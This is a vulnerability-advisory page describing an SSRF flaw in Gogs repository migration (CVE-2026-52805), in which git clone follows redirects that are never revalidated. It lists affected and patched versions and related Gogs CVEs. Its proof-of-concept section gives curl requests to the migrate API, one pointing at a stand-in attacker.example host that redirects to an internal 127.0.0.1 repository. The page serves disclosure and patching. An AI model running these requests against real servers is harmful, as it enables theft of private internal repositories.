CVE-2026-52805High· 8.7▾ TwilightGogs has a Migration Redirect Bypass that Leads to Internal Repository Theft
▾ Twilight zone — High severity, or a signal on a lesser flaw
impact 47.8 · likelihood 0.1 · exploitation 0
Need a working PoC? Pro members can cast a request and our team develops one — it lands right here.
Exploit-prediction probability, daily snapshots since Jul 4.
Disclosure to exploitation, from the record and what we observed since indexing it.
Disclosed via GHSA
0.4%
A Server-Side Request Forgery (SSRF) vulnerability exists in the repository migration functionality. The application validates only the initially submitted URL hostname, but git clone --mirror follows HTTP redirects. An authenticated user can submit a public URL that redirects to a blocked internal endpoint (e.g., 127.0.0.1), importing the internal repository's contents into an attacker-controlled repository.
The vulnerability is located in internal/form/repo.go. ParseRemoteAddr() validates the clone address hostname against a blocklist of local and private-network addresses. However, the actual migration is performed by git clone --mirror in internal/database/repo.go, which follows HTTP redirects without revalidation:
http://attacker.example/redirect.git — passes validation (public hostname).302 redirect to http://127.0.0.1:18081/victim/private.git.The root cause is that Gogs validates only the initial URL and does not revalidate the final redirect target.
This vulnerability bypasses the intended localhost/private-network migration restriction. Any authenticated user who can migrate repositories can import contents from internal Git endpoints reachable from the Gogs server. This allows attackers to:
Prerequisites: a Gogs instance, an attacker account that can create repositories.
127.0.0.1:18081.302 redirect to http://127.0.0.1:18081/victim/private.git.curl -sS -X POST -H "Authorization: token ${TOKEN}" \
-H "Content-Type: application/json" \
--data '{"clone_addr":"http://127.0.0.1:18081/victim/private.git","uid":2,"repo_name":"blocked"}' \
"${GOGS_URL}/api/v1/repos/migrate"
Result: rejected as blocked local address.
curl -sS -X POST -H "Authorization: token ${TOKEN}" \
-H "Content-Type: application/json" \
--data '{"clone_addr":"http://attacker.example/redirect.git","uid":2,"repo_name":"stolen","private":true}' \
"${GOGS_URL}/api/v1/repos/migrate"
Result: migration succeeds. The new repository contains the internal repository's contents.
gogs.io/gogs < 0.14.3Upgrade to a patched release:
gogs.io/gogs 0.14.3Connected by shared product, vendor, weakness, or advisory.
CVE-2025-64719Medium· 4.9Gogs has a Denial of Service in repository/wiki file listing web pages
CVE-2026-25119HighGogs has an Authentication Bypass via Unvalidated Reverse Proxy Headers
CVE-2026-52796Low· 3.5Gogs has DoS in rendering issue index pattern
CVE-2026-52798High· 8.9Gogs has Stored XSS in `.ipynb` Preview
CVE-2026-52799High· 7.5Gogs Missing Authorization in Attachment Download
CVE-2026-52800High· 8.8Gogs Vulnerable to CSRF Leading to Organization Owner Takeover